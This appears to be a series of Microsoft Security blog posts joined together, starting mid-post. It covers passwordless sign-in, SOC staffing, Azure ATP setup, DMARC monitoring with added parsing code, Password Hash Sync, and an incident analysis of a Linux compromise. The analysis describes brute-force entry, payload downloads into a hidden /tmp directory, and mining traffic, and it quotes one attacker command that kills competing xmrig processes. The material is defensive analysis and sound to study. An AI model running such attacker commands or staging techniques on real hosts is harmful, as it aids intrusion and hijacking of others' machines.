With this announcement, you can use Windows Hello or FIDO2 compliant Microsoft-compatible security keys for sign-in to the web on Windows 10. This is available on Mozilla Firefox version 66 and above and will soon be supported on Chromium-based browsers, including Microsoft Edge on Chromium, when signing in to a Microsoft account and other websites supporting FIDO authentication.

Figure 5. Using Windows Hello to sign in to a Microsoft account on Firefox.

To learn how to enable FIDO authentication, watch Enabling your application and services to use passwordless authentication and read Windows Hello FIDO2 certification gets you closer to passwordless.

Streamlined Windows Hello PIN recovery above the lock screen

We know that users occasionally forget their Windows Hello PIN, so we wanted to provide our Microsoft account users with a revamped “I forgot my PIN” experience above the Windows lock screen with the same look and feel as signing in on the web. Just like first time sign-in, you can use the Microsoft Authenticator app instead of a password to reset your PIN when signing in.

Figure 6: Streamlined Windows Hello PIN recovery experience above lock.

Let us know what you think

While there’s still a ways to go in our passwordless platform journey, we’re excited for you to try these new features and let us know what you think. Comments, questions, and feedback are all welcome! You can reach out to us at or by posting in the Windows 10 Feedback Hub app.


Lessons learned from the Microsoft SOC Part 2b: Career paths and readiness

The “Lessons learned from the Microsoft SOC” blog series is designed to share our approach and experience with security operations center (SOC) operations, so you can use what we learned to improve your SOC. The learnings in the series come primarily from Microsoft’s corporate IT security operation team, one of several specialized teams in the Microsoft Cyber Defense Operations Center (CDOC). We’ve also included lessons our Detection and Response Team (DART) have learned helping our customers respond to major incidents and insights from the other internal SOC teams.

Today, we wrap up our discussion on people—our most valuable resource in the SOC. In the first part of our discussion, Part 2a: Organizing people, we covered how to set up people in the security operations center (SOC) for success. Today, we talk about our investments into readiness programs and career paths for our SOC analysts as well as recruiting for success. We’ll close the series with discussions about the technology that enables our people to accomplish their mission.

Something new every day

When an analyst walks into our SOC for a shift, they never know what to expect. They must be ready for anything as they face off with intelligent, adaptable, and well-funded adversaries who are intent on evading our defenses. For each problem, they must apply their unique knowledge and experience, the accumulated learnings from our SOC, and the expertise of their SOC teammates.

Our investments into readiness programs, career paths, and recruitment strategies are designed so our SOC analysts are prepared to succeed in their duties, increase mastery of their discipline, and grow as individuals. This ensures that our SOC staff brings their best to every shift, every time.

You may have to adapt some of these practices to the unique needs of your security operations team to be successful. We’re fortunate to have dedicated security operations teams, dedicated facilities, and experienced peers to learn from already on staff, but understand not all security organizations have these resources available.

Analyst roles and career paths

Empowering humans means investing in them. Being a SOC analyst is a high-stress job, and we know our success is built upon actively engaged people applying their experience and problem-solving creativity. The longer our analysts do this work the better they get, so it’s important to nurture a long-running, sustainable workforce. This starts by clearly defining a career path. Our tier model not only organizes the work of the SOC, but also guides our analysts in building their knowledge and skills and shapes their careers with increasing levels of skill and different challenges.

Because we strive to empower and attract smart people with a continuous learning mindset, we’re motivated to promote from within. An analyst’s career path typically progresses from Tier 1 to Tier 2 to Tier 3 or to incident response, program management, security product engineering, or leadership tracks. There are exceptions, but this tends to be the norm.

  • Tier 1—Analysts acquire and refine core skills including attacker mindset and techniques, using detection and investigation tools, working with internal teams and processes, and calmly applying a thoughtful approach in a high pressure situation. This is similar to martial arts where beginners acquire basic competencies (marked by a progression of colored belts) until they have achieved their black belt and move to the next stage of skills. Similarly, transition from Tier 1 to Tier 2 is a key turning point in the career of an analyst.
  • Tier 2—Analysts continue to hone their skills as they move from executing well-defined playbooks for (mostly) predictable incidents at Tier 1 to investigating advanced incidents with greater unpredictability. Tier 2 analysts investigate attack operations conducted by organized groups with specialized skills and a specific targeted goal. Analysts investigating these incidents continue growing skills while learning from Tier 2 peer analysts and the incidents themselves. Over time, senior Tier 2 analysts often shadow different Tier 3 teams as they try out potential career paths and/or prepare for the next stage of their career.
  • Tier 3—At this level, analyst career paths typically start to diverge into deeper specialties. Analysts can choose to pursue mastery of a particular skill or increasing competency across multiple skills. Tier 3 increasingly requires data analytics skills on the team, because proactive hunting, investigation of advanced attacks, and automation development frequently require navigating many datasets with massive amounts of information.

Careful balancing

Defining a clear career path is important, but like all disciplines dealing with people, we must carefully balance and manage some nuances along the way.

  • Balancing short and long term goals—As our analysts learn new skills and progress through their career, they learn to balance goals, such as ensuring alerts and cases are handled as top priority while simultaneously developing creative solutions that can reduce toil and increase efficiency over the long term.
  • Balancing empowerment and guidance—Managers and senior personnel need to strike this careful balance as they mentor analysts in their career. This is particularly important at key transition points, such as when an analyst first onboards into a new role. Much as in many martial arts films, where the talented but “not fully trained” student has an overabundance of confidence and tries to take on more than they can handle, we see a similar dynamic as analysts begin shadowing Tier 3 roles. In this situation, we have to be careful not to discourage this creative impulse (offering a feedback channel for ideas) while coaching and guiding analysts to complete their learning from seasoned professionals and focus on the journey ahead.

Recruiting for success

Recruiting people and developing their skills is one of the most critical aspects of the SOC’s success. The biggest challenges in this space are the scarcity of people with the right skillsets, the speed at which skillsets must evolve, the potential for analyst burnout, and the need to blend diverse skills and perspectives to address both the human and technical aspects of attacks.

Much has been written about the scarcity of cybersecurity skills. We recommend reading a relevant blog on this topic that offers different ways of addressing the scarcity of talent in security. Additionally, you may want to watch a recent RSA Conference Keynote from Ann Johnson (Corporate Vice President of Cybersecurity Solutions Group at Microsoft), which addresses many related topics including the mental health and burnout risks our industry faces.

The evolving skillset challenge is particularly acute for our SOC because classic SOCs tend to be network centric, but our detection and investigation have evolved to rely primarily on device, identity, and application specific tooling. While we still have and use advanced network security tools, their role has narrowed significantly over the years to supporting investigation and advanced hunting. As of the writing of this blog, it’s been over two years since the primary detection of an attack on our corporate environment came from a network tool. We expect this trend to continue and have oriented our analyst readiness accordingly.

When it comes to recruiting and building skilled analysts, we’ve found that we require a combination of diverse perspectives and some common traits. As with any role, success requires having a diverse team with different backgrounds, mindsets, and skillsets to bring more perspective to the problems at hand and surface better solutions faster. We’ve also found certain personality traits tend to make analysts more successful in a fast-paced high-pressure work environment of a SOC.

It’s critical to note that the following observations are general trends and not absolute rules. The primary factor of success in hiring an individual into a role is that particular person and how well they fit the role. With that said, we tend to look for people with a kind of “grace under pressure,” as we find it’s easier to teach technical and security skills to people with a growth mindset and a calm demeanor under pressure than it is to do the reverse.

For example, we have found that people with military experience are often a good fit because they have experience focusing on the mission despite the strong distractions in ambiguous situations with active hostile adversaries.

We’ve also had success with recruiting and investing into people early in their careers who are eager to learn and have few preconceptions. We’ve had good results with integrating seasoned professionals, but there are simply not enough available for the needs of the marketplace today.

An interesting aspect of the SOC attracting mission-oriented personalities is that when we have a major incident off hours, we more often get too many people volunteering to help versus not enough—a good “problem” to have!

Building skills and job readiness

Because of the high complexity required to be an effective SOC analyst, it’s difficult to educate new analysts in the ways of the SOC through formal training alone. We’ve tried different training approaches to build skills over the years and have found the apprenticeship model to be most effective at rapidly and consistently building skills. For new analysts we take an “I do, we do, you do” approach that progresses from observation to hands on with supervision of a seasoned analyst to independent investigation with support from peers and mentors.

This is similar to other industries with a need to transfer rich context and nuance during real world practice, such as an internship or a residency during a medical career.

The readiness process focuses on building understanding and competency in three domains:

  1. Technical tools/capabilities.
  2. Our organization (mission and assets being protected).
  3. Attackers (motivations, tools, techniques, habits, etc.).

These competencies map well to established doctrine on human conflict. Sun Tzu’s advice to “know thyself” and “know thy enemy” map well to the second and third domains. Our SOC processes also map well to thinking from Colonel John Boyd’s OODA ‘loop’ on real-time human conflict: observe, orient, decide, act.

Beyond the competencies, we also need to train our analysts to be big picture thinkers and maintain an end-to-end view of the attack. It’s not enough to focus on a single threat, but to also “look left and right.” We need our analysts to think about how else the attacker might be trying to gain access and what else they may be after. For example, a password spray may be a potential entry to a multi-stage attack. An attacker may be using a distributed denial-of-service (DDoS) attack to provide a smokescreen to distract from their real objective.

We supplement this apprenticeship model with structured, formal training on topics, such as new products or features and SOC procedures. We also encourage attendance at conferences and work hard to ensure our staffing model supports these and other learning opportunities, so they aren’t empty promises.

This approach has been successful allowing us to train new Tier 1 analysts in approximately 10–12 weeks and we’re continuously looking for ways to improve our readiness processes. In addition, our staffing approach has been critical at mitigating burnout risk.

Learn more

For a visual depiction of our SOC philosophy, download our Minutes matter poster. Also, read previous posts in the “Lessons learned from the Microsoft SOC” series, including Part 1: Organization and Part 2a: Organizing people as well as see our full CISO series to learn more.

For more discussion on some of these topics, see John and Kristina’s session (starting at 1:05:48) at Microsoft’s recent Virtual Security Summit.

Stay tuned for the next segment in “Lessons learned from the Microsoft SOC” where we discuss the technology that enables our people to accomplish their mission.


Step 10. Detect and investigate security incidents: top 10 actions to secure your environment

“Step 10. Detect and investigate security incidents” is the final installment in the Top 10 actions to secure your environment blog series. Here we walk you through how to set up Azure Advanced Threat Protection (Azure ATP) to secure identities in the cloud and on-premises.

Azure ATP is a service in the Microsoft Threat Protection solution, which integrates with Azure Identity Protection and Microsoft Cloud App Security and leverages your on-premises Active Directory signals to identify suspicious user and device activity with both known-technique detection and behavioral analytics. It protects user identities and credentials stored in Active Directory and allows you to view clear attack information on a simple timeline for fast triage. Integration with Windows Defender Advanced Threat Protection (Windows Defender ATP) provides a single interface to monitor multiple entry points.

Azure ATP works by analyzing data sent by Azure ATP sensors that parse network traffic from domain controllers (Figure 1). In this blog, we share resources and advice that will help you install and configure the Azure ATP sensors following these steps:

  • Plan your Azure ATP capacity.
  • Install the Azure ATP sensor package.
  • Configure Azure ATP sensor.
  • Detect alerts.

Infographic showing the Azure ATP architecture: Azure ATP sensors parse network traffic from domain controllers and send it to Azure ATP for analysis.

Figure 1: Azure ATP sensors parse network traffic from domain controllers and send it to Azure ATP for analysis.

Plan your Azure ATP capacity

Before you begin your Azure ATP deployment, you’ll need to determine what resources are required to support your Azure ATP sensors. An Azure ATP sensor analyzes network traffic and reads events locally, without the need to purchase and maintain additional hardware or configurations. The Azure ATP sensor also supports Event Tracing for Windows (ETW), which provides the information for multiple detections. ETW-based detections include suspected DCShadow attacks that attempt to use domain controller replication requests and domain controller promotion.

The recommended and simplest way to determine capacity for your Azure ATP deployment is to use the Azure ATP sizing tool. Once you download and run the tool, the details in the “Busy Packets/sec” field will help you determine the resources required for your sensors.

Next, you create your Azure Advanced Threat Protection instance and connect it to your Active Directory forest. You’ll need an Azure Active Directory (Azure AD) tenant with at least one global or security administrator. A single Azure ATP instance can cover multiple Active Directory forests, with a Forest Functional Level (FFL) of Windows Server 2003 or above.

Install the Azure ATP sensor package

Once Azure ATP is connected to Active Directory, you can download the sensor package. Click Download in the Azure ATP portal to begin the process. Copy the access key at the same time; you’ll need it when you install the sensor (Figure 2).

Screenshot showing the access key and sensor setup download button in the Azure ATP portal.

Figure 2: The access key is used in installation.

Next, verify the domain controller(s) on which you intend to install Azure ATP sensors have internet connectivity to the Azure ATP Cloud Service. These URLs automatically map to the correct service location for your Azure ATP instance:

  • For console connectivity: <your-instance-name> (For example, “”)
  • For sensors connectivity: <your-instance-name> (For example, “”)

Note: There is no “.” Between <your-instance-name> and “sensorapi”.

Extract the files from the ZIP and run the Azure ATP sensor setup.exe, which initiates the installation wizard. When you get to the Configure the Sensor screen, enter the access key you copied during the download.

Note that all domain controllers in your environment should be covered by an Azure ATP sensor. The Azure ATP sensor supports the use of a proxy.

For more information on proxy configuration, see Configuring a proxy for Azure ATP.

Configure the Azure ATP sensor

The domain synchronizer is responsible for synchronization between Azure ATP and your Active Directory domain. Depending on the size of the domain, the initial synchronization may take time and is resource intensive. We recommend setting at least one domain controller as the domain synchronizer candidate per domain. This ensures Azure ATP is actively scanning your network at all times. By default, Azure ATP sensors aren’t domain synchronizer candidates. To manually set an Azure ATP sensor as a domain synchronizer candidate, switch the domain synchronizer candidate toggle option to ON in the configuration screen (Figure 3).

Screenshot showing the domain synchronizer candidate toggle switched to ON.

Figure 3: The domain synchronizer candidate toggle option set to ON in the configuration screen.

Next, manually tag groups or accounts as sensitive to enhance detections. This is important because some Azure ATP detections, such as sensitive group modification detection and lateral movement paths, rely on sensitive groups and accounts.

We also recommend that you integrate Azure ATP with Windows Defender ATP. Windows Defender ATP monitors your endpoints and the integration provides a single interface to monitor and protect your environment. It is easy to turn on the integration from the Azure ATP portal (Figure 4).

Screenshot showing the Integration with Windows Defender ATP toggle switched to ON.

Figure 4: A simple toggle enables integration with Windows Defender ATP.

You can also integrate with your VPN solution to collect additional user information, such as the IP addresses and locations where connections originated. This complements the investigation process by providing additional information on user activity as well as a new detection for abnormal VPN connections.

Detect alerts

After you set up Azure ATP, we recommend that you set up an Azure ATP security alert lab to help you better understand the alerts that may be generated in your environment. The lab includes a reconnaissance playbook that shows how Azure ATP identifies and detects suspicious activities from potential attacks. The lateral movement playbook shows Azure ATP’s lateral movement path detections and the security alerts they raise. In the domain dominance playbook, you’ll simulate some common domain dominance methods. For best results, set up your lab as close as possible to the instructions in the tutorial.

When Azure ATP is configured, you will be able to manage security alerts in the Security Alerts Timeline of the Azure ATP portal. Azure ATP security alerts provide tools to discover which suspicious activities were identified on your network and the actors and computers involved in the threats. Alerts are organized by threat phase, graded for severity, and color-coded to make them easy to visually filter.

Learn more

This completes our series, “Top 10 actions to secure your environment.” Review the entire series for advice on setting up other Microsoft 365 security products, such as Azure AD or Microsoft Cloud App Security.



Secure your journey to the cloud with free DMARC monitoring for Office 365

Not knowing who is sending email “from” your organization is an enormous problem for IT managers for two reasons.

One problem is “shadow IT”—cloud services that employees have signed up for without IT oversight. Many of these services send mail—to employees, customers, or marketing prospects—which appear to come from your organization, opening you to legal and security risks. Identifying these services and getting them under control is a critical step in any cloud migration project.

The second problem is phishing, which plays a role in over 90 percent of all cyberattacks. For phishers, there’s not a more valuable tool than the ability to impersonate senders. These scammers rely on the fact that there is little stopping them from spoofing any domain they like in the “from” field of their phishing messages.

Domain-based Message Authentication, Reporting, and Conformance (DMARC) is an essential tool for solving both of these problems. When an organization gets its domains to a quarantine or reject policy—what’s known as DMARC enforcement—it gains visibility into and control over all email purporting to be from that organization, at every receiver that honors DMARC. For more on DMARC policies and how they pertain to inbound mail, read the “Best practices on implementing DMARC in Office 365” section in the Microsoft article Using DMARC to validate email in Office 365.

Before a company can get to an enforcement policy, it needs to identify all the email senders using its domain. If this crucial and potentially challenging step is omitted, it may wind up inadvertently blocking legitimate email sources (like a payroll provider or your CRM tool), simply because it hasn’t specifically authorized them.

While the benefits of DMARC are clear, many organizations have had trouble with the implementation of this open standard. DMARC directs receiving mail servers to send aggregate reports back to domain owners, so they can analyze which services are sending mail on their behalf. This data is valuable for both cloud migration and anti-phishing projects.

But it can be difficult to extract actionable intelligence from these reports, which are typically large XML files containing long lists of IP addresses with per-IP message counts and SPF/DKIM results. Companies need to do extensive “detective work” to figure out which services correspond to those IPs and which people within their organization are responsible for those services, and then update the corresponding Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) records, and eventually the DMARC policy itself, so that the legitimate services are properly authorized. What’s more, every change requires updating the Domain Name System (DNS), which itself can be an involved process.
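To make that “detective work” concrete, here is an added example (not Valimail’s or Microsoft’s code) that reads one aggregate report, totals passing and failing messages per sending IP, and makes a first triage pass. The report itself, the domain, the IPs and the counts are constructed for illustration; the XML layout is the aggregate-report format defined in RFC 7489. The triage rule at the end is a heuristic of this example, not part of the standard.

```python
"""Summarize a DMARC aggregate (rua) report per sending IP.

Added example; this is not Valimail's or Microsoft's code. The XML follows the
aggregate-report format from RFC 7489 (Appendix C). The report, domain, IPs
and counts below are constructed for illustration.
"""
import xml.etree.ElementTree as ET

SAMPLE_REPORT = """<?xml version="1.0"?>
<feedback>
  <report_metadata>
    <org_name>receiver.example</org_name>
    <report_id>2019-04-01-example</report_id>
    <date_range><begin>1554076800</begin><end>1554163200</end></date_range>
  </report_metadata>
  <policy_published>
    <domain>example.com</domain><adkim>r</adkim><aspf>r</aspf>
    <p>none</p><sp>none</sp><pct>100</pct>
  </policy_published>
  <record>
    <row><source_ip>192.0.2.10</source_ip><count>120</count>
      <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>pass</spf></policy_evaluated></row>
    <identifiers><header_from>example.com</header_from></identifiers>
    <auth_results><dkim><domain>example.com</domain><result>pass</result></dkim>
      <spf><domain>example.com</domain><result>pass</result></spf></auth_results>
  </record>
  <record>
    <row><source_ip>198.51.100.7</source_ip><count>40</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><header_from>example.com</header_from></identifiers>
    <auth_results><spf><domain>payroll-vendor.example</domain><result>pass</result></spf></auth_results>
  </record>
  <record>
    <row><source_ip>203.0.113.99</source_ip><count>15</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><header_from>example.com</header_from></identifiers>
    <auth_results><spf><domain>203.0.113.99</domain><result>none</result></spf></auth_results>
  </record>
</feedback>
"""


def parse_report(xml_text):
    """Return (published policy, per-IP summary) from one aggregate report."""
    root = ET.fromstring(xml_text)
    pub = root.find("policy_published")
    published = {"domain": pub.findtext("domain"), "p": pub.findtext("p")}
    sources = {}
    for rec in root.iter("record"):
        row = rec.find("row")
        ip = row.findtext("source_ip")
        count = int(row.findtext("count"))
        ev = row.find("policy_evaluated")
        # DMARC passes when either aligned DKIM or aligned SPF passes.
        aligned = ev.findtext("dkim") == "pass" or ev.findtext("spf") == "pass"
        entry = sources.setdefault(ip, {"pass": 0, "fail": 0, "spf_domains": set()})
        entry["pass" if aligned else "fail"] += count
        # The raw SPF domain (MAIL FROM) often names the third-party service
        # even when alignment with the header From fails.
        spf = rec.find("auth_results/spf")
        if spf is not None and spf.findtext("domain"):
            entry["spf_domains"].add(spf.findtext("domain"))
    return published, sources


def failure_rate(sources):
    total = sum(s["pass"] + s["fail"] for s in sources.values())
    failed = sum(s["fail"] for s in sources.values())
    return failed / total if total else 0.0


def triage(published, sources):
    """Heuristic first pass (an assumption of this example, not a standard):
    a failing IP whose SPF domain is a real third-party domain is probably a
    vendor to authorize; a failing IP with no usable SPF domain is an unknown
    source to investigate as a possible spoofer."""
    verdicts = {}
    for ip, s in sources.items():
        if s["fail"] == 0:
            verdicts[ip] = "authorized"
        elif any(d not in (published["domain"], ip) for d in s["spf_domains"]):
            verdicts[ip] = "needs_authorization"
        else:
            verdicts[ip] = "unknown_source"
    return verdicts


if __name__ == "__main__":
    published, sources = parse_report(SAMPLE_REPORT)
    print(f"{published['domain']} p={published['p']} failure rate {failure_rate(sources):.1%}")
    for ip, verdict in triage(published, sources).items():
        print(f"{ip:15} pass={sources[ip]['pass']:4} fail={sources[ip]['fail']:4} {verdict}")
```

Real reports arrive as gzipped or zipped XML attachments from many receivers per day, so in practice this runs over every attachment and merges the per-IP totals; the raw SPF domain is the quickest hint for naming a service, but reverse DNS and the vendor’s published SPF include are what you check before adding anything to your own record.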

What if you don’t have the time and resources to allocate to this long-term, sometimes tedious technical analysis?

Valimail Monitor for Office 365 can make this part of the DMARC journey much easier. Instead of manually parsing the massive amount of XML-based IP address data you get in DMARC reports, Valimail Monitor for Office 365 digests DMARC aggregate reports and turns them into an easily readable list of named services. In addition, for each of these services, Valimail shows how many messages are passing authentication and how many are failing and provides overall stats on DMARC authentications and authentication failures. This greatly simplifies this critical stage of the DMARC journey.

Screenshot of the DMARC Authentication Failure Rate in the Valimail Monitor dash.

The challenge is identification

Setting up a DMARC record isn’t difficult. It’s a TXT record published at _dmarc.<your domain>, and a working record needs only three tags: v=DMARC1 (the version), p= (the policy: none, quarantine, or reject), and rua= (the mailbox that should receive aggregate reports; strictly only v and p are mandatory, but without rua you get no reports). Once the record is in place, the domain owner receives daily aggregate reports, via email, from every DMARC-aware mail receiver that gets mail using that domain.

The challenging part, as noted above, is using those DMARC aggregate reports to identify all those services that are sending email “as” the domain.

Here’s why it’s hard: In the era of cloud IT, it’s quite common for organizations to have dozens of third-party services sending email on their behalf. For example, an organization may have CRM, HR, support, payroll, and other workflow services that are core to its business. The one thing that ties all these services together is that they all rely on the company’s domain name to send email—notifications, invoices, receipts, and the like—which all need to come “from” the company. Sending under the company’s own domain is the de facto standard because it leverages the implicit trust employees, customers, and partners have when they do business with that company. (Watch a short one-minute video explaining why so many DMARC projects run into trouble.)

Before moving to a policy of enforcement, a company needs to be confident that it has correctly identified all these senders and authorized them, by including them in its SPF record, by configuring their DKIM keys correctly, or both. Either mechanism suffices for a given sender as long as the domain it authenticates aligns with the From domain.

DMARC is incredibly useful to block phishing attacks and protect the brand, but many Office 365 customers who have implemented DMARC have not reached enforcement. They’ve manually parsed DMARC reports with self-help tools or consulting support. They’ve looked at millions of lines of XML to extract IP addresses which they then need to translate to named services. These services themselves may live on multi-tenant clouds, so discerning the true identity of a given service is further challenging because the underlying cloud infrastructure could be shared and may change without notice.

A fully automated, free service

Valimail Monitor for Office 365 makes the service-discovery component of DMARC implementation far easier, providing a fully automated visibility service, free of charge. With Valimail, Office 365 users can easily see all third-party services sending on their behalf, as well as potential imposters that are spoofing their brand. It eliminates the need to wade through XML-based aggregate reports or try to interpret which IP addresses correspond to which cloud services. Valimail Monitor for Office 365 provides a clean, clear, human-readable interface that lists services and their email volume on the domain in plain English.

Screenshot of reports in the Valimail Monitor dashboard.

With full visibility, Office 365 customers will be armed with all the information they need to determine which services are legitimate and authorized. From there, they’ll be in a position to confidently move their organization to full DMARC enforcement, where all unauthenticated traffic is blocked. Valimail makes this easy as well, with an upgrade path to Valimail Enforce, which fully automates DMARC enforcement.

As a member of the Microsoft Intelligent Security Association, Valimail provides a critical free service for Office 365 customers who want the benefits of DMARC enforcement. DMARC enforcement, together with the anti-spoofing and anti-phishing capabilities in Office 365, stops an entire class of phishing attacks: messages that forge your exact domain in the From header. (It does not, by itself, address lookalike domains or mail sent from compromised accounts, which still need other controls.)

Configuring Valimail Monitor for Office 365

Here’s how to get started with Valimail Monitor for Office 365:

  1. Sign up at the Valimail Monitor for Office 365 website.
    Note: This is a free service for Office 365 customers. Once you sign up, Valimail will email you the simple configuration instructions.
  2. Set aside five minutes to make the change in DNS to send your DMARC reports to Valimail (this has no impact on your email flow, deliverability, or any other aspect of your DNS). Because the reports are being directed to a domain other than your own, DMARC also requires the receiving domain to publish a record authorizing reports for your domain; mailbox providers check for that record before they send anything, so confirm it is in place if reports do not arrive.

Screenshot of Source of Email in last thirty days in the Valimail Monitor dashboard.

Within two weeks, Valimail Monitor will provide you a list of senders using your domain, and it will keep the list updated in real time as DMARC reports continue to flow in. It also shows you where in the world emails sent using your domain are coming from. Don’t have an office or server in Brazil? That might just be the red flag you need to shut down a phisher impersonating your brand.

Using the Valimail dashboard, you’ll have the intelligence you need to know who is sending email using your domain and from where, so you can focus your time and resources on more complex activities to protect your organization.

Sign up for free at:

The post Secure your journey to the cloud with free DMARC monitoring for Office 365 appeared first on Microsoft Security.

Demystifying Password Hash Sync

This blog is part of a series of posts providing a behind-the-scenes look of Microsoft’s Detection and Response Team (DART). While responding to cybersecurity incidents around the world, DART engages with customers who are wary about using Password Hash Sync (PHS) or are not utilizing this service’s full capabilities. As customers can gain tremendous security benefits using the full capabilities of this service, we want to demystify PHS.

What PHS is and is not

What is PHS? First, let’s start with what it is not. PHS doesn’t sync actual passwords. What it syncs is derived from the password hash already held by your on-premises Active Directory: that hash is combined with a per-user salt and run through 1,000 iterations of HMAC-SHA256 (a PBKDF2 key derivation) before the result is sent to Azure Active Directory (Azure AD). Through our hands-on experiences, we’ve learned that many companies believe that Microsoft may have access to users’ passwords. Microsoft is committed to protecting your privacy, and it’s important to note that a hash is a one-way function: it cannot be reversed to recover the password, so the plain-text version of the password is never transmitted to and can never be exposed to Microsoft. (As with any password hash, the salt and iteration count are what make offline guessing expensive, so password quality still matters.)

The second important consideration is that, with PHS, authentication for cloud resources moves from your current identity provider to Azure AD. This allows the organization to move from an identity provider that is typically an on-premises server, requiring maintenance and potentially server downtime, to a platform-as-a-service (PaaS) provider.

From a security perspective, organizations gain significant reliability advantages and improved capabilities by moving to PHS, including Smart Lockout, IP Lockout, and the ability to discover leaked credentials, as well as the benefits of utilizing Microsoft’s billions of worldwide data points as additional layers of security to your organization’s environment.

More about these key features:

  • Smart Lockout assists in blocking bad actors who are attempting to brute force passwords. By default, Smart Lockout locks the account from sign-in attempts for one minute after ten failed attempts. Smart Lockout tracks the last three bad password hashes to avoid re-incrementing the lockout counter when the same wrong password is retried. For more information on Smart Lockout, see Azure AD Smart Lockout.
  • IP Lockout works by analyzing those billions of sign-ins to assess the quality of traffic from each IP address hitting Microsoft’s systems. With that analysis, IP Lockout finds IP addresses acting maliciously, such as an IP that is password spraying the tenant, and blocks those sign-ins in real time, while allowing the real user to continue to sign in successfully.
  • Microsoft Leaked Credentials Service acquires username/password pairs by monitoring public web sites and the Dark Web and by working with:
    • Researchers
    • Law enforcement
    • Microsoft Security teams
    • Other trusted sources

When the service acquires username/password pairs, the passwords are sent through the same hashing algorithm and are checked against Azure AD users’ password hashes. When a match is found (indicating a compromised credential), a “Leaked Credentials Risk Event” is created. Please see Azure AD Risk Events for additional information regarding Leaked Credentials.

Another important benefit of PHS is that, should your tenant experience a Denial of Service (DoS) or password spray attack, Microsoft takes the brunt of that traffic: it is directed at Microsoft, not at your on-premises Active Directory Federation Services (AD FS). When authentication happens via on-premises AD FS, your servers have to absorb that load, which can cause downtime.

Moving an organization’s identity management provider to Azure AD and utilizing Password Hash Sync allows for both an increase in overall security posture and reduced management overhead. The security benefits, including leaked credentials, IP lockout, and Smart Lockout, all utilize Microsoft’s telemetry that gives organizations the power of Microsoft’s intelligence.

NOTE: If PHS is the secondary authentication method and you want to take advantage of Smart Lockout and IP Lockout, the primary authentication method must support these functions, because they act on the sign-in path that is actually being used. In a hybrid environment where federation or Pass-through Authentication is primary, PHS is still recommended as the secondary method, both as a redundancy mechanism and so that the Leaked Credentials check has hashes to compare against.
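The Smart Lockout rules described above are easy to misread, so here is an added simulation (not Microsoft’s code, and not how Azure AD is implemented internally) that encodes them as stated: ten failures lock sign-in for one minute, and the last three bad passwords are remembered so that resending one of them does not advance the counter. Resetting the counter after a successful sign-in or an expired lockout is an assumption of the simulation.

```python
"""Simulate the Smart Lockout rules described above.

Added example; not Microsoft's code and not how Azure AD is implemented
internally. It encodes the stated rules: ten failures lock sign-in for one
minute, and the last three bad passwords are remembered so that re-sending
one of them does not increment the counter again. Resetting the counter on a
successful sign-in or once a lockout ends is an assumption of the simulation.
"""
import hashlib
import time
from collections import deque


class SmartLockout:
    def __init__(self, threshold=10, lockout_seconds=60, clock=time.monotonic):
        self.threshold = threshold
        self.lockout_seconds = lockout_seconds
        self.clock = clock          # injectable so behaviour can be tested without sleeping
        self.failures = {}          # user -> count of distinct bad passwords since last reset
        self.recent_bad = {}        # user -> digests of the last three bad passwords
        self.locked_until = {}      # user -> clock value at which the lockout ends

    @staticmethod
    def _digest(password):
        # Only a digest is kept; the tracker never stores the attempted password.
        return hashlib.sha256(password.encode("utf-8")).hexdigest()

    def attempt(self, user, password, verify):
        """verify(password) -> bool stands in for the real credential check."""
        now = self.clock()
        if self.locked_until.get(user, 0) > now:
            return "locked"
        if verify(password):
            self.failures.pop(user, None)
            self.recent_bad.pop(user, None)
            return "ok"
        recent = self.recent_bad.setdefault(user, deque(maxlen=3))
        digest = self._digest(password)
        if digest in recent:
            return "bad"            # same wrong password again: no extra penalty
        recent.append(digest)
        self.failures[user] = self.failures.get(user, 0) + 1
        if self.failures[user] >= self.threshold:
            self.locked_until[user] = now + self.lockout_seconds
            self.failures[user] = 0
            return "locked"
        return "bad"


if __name__ == "__main__":
    t = [0.0]
    lockout = SmartLockout(clock=lambda: t[0])
    check = lambda pw: pw == "correct horse battery staple"
    for i in range(12):
        print(i, lockout.attempt("alice", f"guess{i}", check))
    t[0] = 61.0
    print("after lockout:", lockout.attempt("alice", "correct horse battery staple", check))
```

The detail worth noticing for detection engineering is the three-entry memory: a user who keeps retyping one stale password never locks, while a spray that rotates through many candidates does, and a fourth distinct candidate evicts the oldest so that candidate counts again if it returns.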

Learn more

To learn more about DART, our engagements, and how they are delivered by experienced cybersecurity professionals who devote 100 percent of their time to providing cybersecurity solutions to customers worldwide, please contact your account executive. Also, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Read DART: the Microsoft cybersecurity team we hope you never meet for more about the DART team.

The post Demystifying Password Hash Sync appeared first on Microsoft Security.

Uncovering Linux based cyberattack using Azure Security Center

As more and more enterprises move to the cloud, they bring their own set of security challenges with them. Today, almost half of Azure virtual machines (VMs) are running Linux, and as the Linux server population grows, so do the attacks targeting it. As detection capabilities advance, attackers are using new and stealthier techniques to stay undetected and persist. Azure Security Center, Microsoft’s cloud workload protection service, helps customers safeguard their cloud workloads and protect them from these threats.

In this blog post, we detail a real-world Linux attack whose purpose initially looked like crypto mining, but it turned out that the attacker’s intent was to use the compromised host as a launchpad for further large-scale attacks.

Incident details

After the initial SSH brute-force compromise, the attacker downloaded a first-stage ‘’ script using utilities like ‘wget’; that script then delivered further payloads to the host. Azure Security Center surfaces this behavior via a “Detected suspicious file download” alert.

After the stage 1 download, the attacker executed the script, which enumerated multiple hosting URLs to find ‘dota.tar.gz’. Once a live hosting IP was found, the second-stage file was delivered into the directory ‘/tmp/.mountfs’. Most of these exploitation and persistence techniques are observed from the /tmp folder; in this case all activities were tracked under the /tmp/.mountfs and /tmp/.mountfs/.rsync directories. Names that start with a dot are omitted from a plain directory listing, a common technique attackers use to keep their staging area out of sight.

Later, we see traffic to different mining pools including ‘’ but nothing further that would confirm the purpose as mining cryptocurrency. The “Detected suspicious network activity” analytic triggered on this activity along with “Digital currency mining” analytic. This was followed by reconnaissance grep activity used by the attacker to get more information on the target machine to see if it had already been compromised and in use by other actors.

The attackers then used a bash script to find and kill processes belonging to some of the above-mentioned miners, using this command:

ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9

